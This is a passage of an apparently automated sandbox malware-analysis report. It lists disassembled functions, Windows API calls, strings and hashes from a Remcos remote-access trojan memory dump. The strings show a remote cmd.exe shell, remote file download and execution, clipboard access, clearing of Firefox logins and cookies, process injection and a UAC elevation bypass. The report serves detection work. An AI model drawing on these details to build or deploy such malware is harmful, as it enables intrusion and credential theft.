                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: send
                                                                        • String ID:
                                                                        • API String ID: 2809346765-0
                                                                        • Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                                                        • Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
                                                                        • Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                                                        • Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26
                                                                        Function 00426CB1 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: recv
                                                                        • String ID:
                                                                        • API String ID: 1507349165-0
                                                                        • Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                                                        • Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
                                                                        • Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                                                        • Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725
                                                                        Function 00411CA3 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                        • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                        • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                        • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06

                                                                        Non-executed Functions

                                                                        Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                                                          • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C2EC
                                                                          • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C31C
                                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C371
                                                                          • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C3D2
                                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C3D9
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                                                        • GetLogicalDriveStringsA.KERNEL32 ref: 00408278
                                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                                                        • DeleteFileA.KERNEL32(?), ref: 00408652
                                                                          • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                                                          • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                          • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                          • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                        • Sleep.KERNEL32(000007D0), ref: 004086F8
                                                                        • StrToIntA.SHLWAPI(00000000), ref: 0040873A
                                                                          • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32 ref: 0041CAD7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                        • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                        • API String ID: 1067849700-181434739
                                                                        • Opcode ID: f1c4d7739d7eae771163d17408f63fe79efc26d29021ee7ab5f791f0dca45ecd
                                                                        • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                                                        • Opcode Fuzzy Hash: f1c4d7739d7eae771163d17408f63fe79efc26d29021ee7ab5f791f0dca45ecd
                                                                        • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                                                        Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        • __Init_thread_footer.LIBCMT ref: 00405723
                                                                        • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                                                        • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                                        • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                        • CloseHandle.KERNEL32 ref: 00405A23
                                                                        • CloseHandle.KERNEL32 ref: 00405A2B
                                                                        • CloseHandle.KERNEL32 ref: 00405A3D
                                                                        • CloseHandle.KERNEL32 ref: 00405A45
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                        • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                        • API String ID: 2994406822-18413064
                                                                        • Opcode ID: 718fc47987a68ddd7fa12657a24cae26bfc2044b7fc503c0b9c134ba558eb6a6
                                                                        • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                                                        • Opcode Fuzzy Hash: 718fc47987a68ddd7fa12657a24cae26bfc2044b7fc503c0b9c134ba558eb6a6
                                                                        • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                                                        Function 004120F7 Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 238threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00412106
                                                                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                          • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                                          • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                                        • OpenMutexA.KERNEL32 ref: 00412146
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412155
                                                                        • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$`2U$fsutil.exe$rmclient.exe$svchost.exe
                                                                        • API String ID: 3018269243-386443670
                                                                        • Opcode ID: 2d0f795493d6dd0f1c0ae32495555cdb290ac7a8c9bea9647889ea0ebcc72388
                                                                        • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                                                        • Opcode Fuzzy Hash: 2d0f795493d6dd0f1c0ae32495555cdb290ac7a8c9bea9647889ea0ebcc72388
                                                                        • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                                                        Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                                                        • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                                                        • FindClose.KERNEL32(00000000), ref: 0040BD12
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$CloseFile$FirstNext
                                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                        • API String ID: 1164774033-3681987949
                                                                        • Opcode ID: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
                                                                        • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                                                        • Opcode Fuzzy Hash: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
                                                                        • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                                                        Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenClipboard.USER32 ref: 004168C2
                                                                        • EmptyClipboard.USER32 ref: 004168D0
                                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                                                        • GlobalLock.KERNEL32 ref: 004168F9
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                                                        • SetClipboardData.USER32 ref: 00416938
                                                                        • CloseClipboard.USER32 ref: 00416955
                                                                        • OpenClipboard.USER32 ref: 0041695C
                                                                        • GetClipboardData.USER32 ref: 0041696C
                                                                        • GlobalLock.KERNEL32 ref: 00416975
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                        • CloseClipboard.USER32 ref: 00416984
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                        • String ID: !D@
                                                                        • API String ID: 3520204547-604454484
                                                                        • Opcode ID: 24192145d40dd5d885ebf24f35a4dad0bb1f4ab0e0a063593ed955df835b7d6e
                                                                        • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                                                        • Opcode Fuzzy Hash: 24192145d40dd5d885ebf24f35a4dad0bb1f4ab0e0a063593ed955df835b7d6e
                                                                        • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                                                        Function 0040F474 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 210processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,@5U,?,00475338), ref: 0040F48E
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F563
                                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F66E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                        • String ID: @5U$C:\Program Files(x86)\Internet Explorer\$Inj$`2U$ieinstal.exe$ielowutil.exe
                                                                        • API String ID: 3756808967-1396632913
                                                                        • Opcode ID: 9696b3c9821f35113208a8e204aa4700f224166d16ac1652e85869771ea54990
                                                                        • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                                                        • Opcode Fuzzy Hash: 9696b3c9821f35113208a8e204aa4700f224166d16ac1652e85869771ea54990
                                                                        • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                                                        Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                                                        • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                                                        • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                                                        • FindClose.KERNEL32(00000000), ref: 0040BED0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Close$File$FirstNext
                                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                        • API String ID: 3527384056-432212279
                                                                        • Opcode ID: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
                                                                        • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                                                        • Opcode Fuzzy Hash: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
                                                                        • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                                                        Function 004132D2 Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                                                        • CloseHandle.KERNEL32(?), ref: 00413465
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                        • String ID:
                                                                        • API String ID: 297527592-0
                                                                        • Opcode ID: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                                        • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                                                        • Opcode Fuzzy Hash: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                                        • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                                                        Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$1$2$3$4$5$6$7$VG
                                                                        • API String ID: 0-1861860590
                                                                        • Opcode ID: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                                        • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                                                        • Opcode Fuzzy Hash: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                                        • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                                                        Function 0041C291 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C2EC
                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C31C
                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C38E
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C39B
                                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C371
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C3BC
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C3D2
                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C3D9
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,`2U,004752F0,00000001), ref: 0041C3E2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                        • String ID: `2U
                                                                        • API String ID: 2341273852-1105716024
                                                                        • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                                        • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                                                        • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                                        • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                                                        Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 00407521
                                                                        • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Object_wcslen
                                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                        • API String ID: 240030777-3166923314
                                                                        • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                                        • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                                                        • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                                        • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                                                        Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                                                        • GetLastError.KERNEL32 ref: 0041A7BB
                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                        • String ID:
                                                                        • API String ID: 3587775597-0
                                                                        • Opcode ID: 4d7e07cc6e00c0f0dc0cba18b78b11ddb9a145c181d83e8bc9a999359985f1ce
                                                                        • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                                                        • Opcode Fuzzy Hash: 4d7e07cc6e00c0f0dc0cba18b78b11ddb9a145c181d83e8bc9a999359985f1ce
                                                                        • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                                                        Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
